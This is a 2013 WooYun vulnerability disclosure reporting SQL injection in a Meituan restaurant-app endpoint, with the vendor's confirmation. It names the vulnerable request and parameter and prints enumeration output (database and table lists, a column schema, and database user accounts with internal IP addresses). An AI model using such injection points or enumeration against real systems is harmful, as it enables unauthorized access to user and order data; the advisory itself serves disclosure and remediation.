当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045362

漏洞标题:APP终结者7#美团吃货App云端Sql注入影响主站多库

相关厂商:美团网

漏洞作者: zzR

提交时间:2013-12-09 10:12

修复时间:2014-01-23 10:13

公开时间:2014-01-23 10:13

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-09: 细节已通知厂商并且等待厂商处理中
2013-12-09: 厂商已经确认,细节仅向厂商公开
2013-12-19: 细节向核心白帽子及相关领域专家公开
2013-12-29: 细节向普通白帽子公开
2014-01-08: 细节向实习白帽子公开
2014-01-23: 细节向公众公开

简要描述:

昨天晚上去吃了个火锅,媳妇儿说团购能便宜个20块钱,然后就美美的拿出了美团APP,然后我就趁机瞅了瞅,本来已经终结的App系列又回来了……

详细说明:

涉及美团APP:美团餐厅+美团外卖+……
请求如下

GET /woodpecker/poi/search?condition= HTTP/1.1
Host: xianfu.meituan.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
User-Agent: 美团餐厅 1.2 (iPhone; iPhone OS 7.0.4; zh_CN)
Connection: keep-alive
Cookie: 1=_from


condition=存在注入

漏洞证明:

当前user和db

1.png


当前库

Database: woodpecker
[52 tables]
+-----------------------+
| accesstoken |
| activemq_info |
| app |
| app_release_info |
| banner |
| canting_user |
| customer_requirements |
| desk_class |
| desk_order |
| desk_order_window |
| dining_table |
| filter_user |
| food |
| food_choose_feature |
| food_feature_count |
| food_material |
| food_offer |
| food_order |
| food_practice |
| food_practice_value |
| food_relation |
| food_set |
| food_tag |
| food_tag_value |
| food_taste |
| food_unit |
| log_info |
| meituan_outer_food |
| meituan_outer_order |
| meituan_outer_poi |
| order_code |
| order_offer |
| ordered_food |
| ordered_reward |
| outer_system |
| pad_info |
| poi_env |
| poi_info |
| poi_member_stat |
| poi_reward |
| poi_score_rules |
| printer |
| return_food_reason |
| score_event |
| special_food |
| statistics_trend |
| tmp |
| tmp_order_code |
| user_feedback |
| user_loyalty |
| wait_queue |
| waiter |
+-----------------------+


垮裤 美团餐厅

Database: xianfu
[36 tables]
+--------------------------+
| accesstoken |
| activity_coupon |
| card_manager_coupon_code |
| cardmanager_log |
| channel |
| client_behaviour |
| client_event |
| client_register |
| client_version |
| coupon |
| coupon_account |
| coupon_account_cookie |
| coupon_batchsend |
| coupon_channel |
| coupon_code |
| coupon_consume |
| coupon_customer |
| coupon_deal |
| coupon_poi |
| couponverify_log |
| customer |
| customer_action_h |
| customer_behaviour |
| customer_demo |
| customer_meituan |
| customer_poi |
| customer_relation |
| customer_weixin |
| customer_weixin_aptcha |
| fastverify_log |
| poi_sync |
| share_group |
| share_group_c |
| super_coupon_info |
| super_coupon_login |
| white_list |
+--------------------------+
Database: xianfu
Table: coupon
[17 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| alertsms | varchar(1024) |
| brandname | varchar(255) |
| content | varchar(1024) |
| couponpic | varchar(255) |
| ctime | int(11) |
| duration | int(4) |
| etime | int(11) |
| event_expiretime | int(11) |
| event_type | int(5) |
| id | int(11) |
| sms | varchar(1024) |
| status | int(3) |
| stime | int(11) |
| title | varchar(1024) |
| type | int(2) |
| utime | int(11) |
| warn | int(11) |
+------------------+---------------+


美团外卖库

Database: waimai
[25 tables]
+----------------------------+
| wm_address |
| wm_app_channel |
| wm_app_version |
| wm_channel |
| wm_discount |
| wm_food |
| wm_food_import |
| wm_food_tag |
| wm_gao_poi_info |
| wm_log |
| wm_order |
| wm_order_detail |
| wm_order_detail_history |
| wm_order_history |
| wm_order_status_utimestamp |
| wm_poi |
| wm_poi_match |
| wm_poi_tag |
| wm_poi_tag_dic |
| wm_poi_utimestamp |
| wm_push_client |
| wm_tradearea_point |
| wm_user |
| wm_user_dialogue |
| wm_user_topic |
+----------------------------+


各个字段什么名字我就不解释了吧
最后dbs

available databases [11]:
[*] biz_auth
[*] information_schema
[*] mysql
[*] pangolin
[*] performance_schema
[*] test
[*] test_waimai
[*] waimai
[*] woodpecker
[*] xfbase
[*] xianfu


看到这个pangolin 了嘛? 看看你们的内裤是不是还好好的
users 各种admin root

database management system users [183]:
[*] 'admin'@'10.64.10.104'
[*] 'admin'@'localhost'
[*] 'meituan_in'@'10.%'
[*] 'monitor'@'10.%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'skrepl'@'10.%'
[*] 'superadmin'@'10.64.10.104'
[*] 'xianfu_waimai'@'10.%'

修复方案:

已经给你们做宣传了,还想怎样哪-0-

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-12-09 10:28

厂商回复:

感谢对美团网的关注,正在处理。

最新状态:

暂无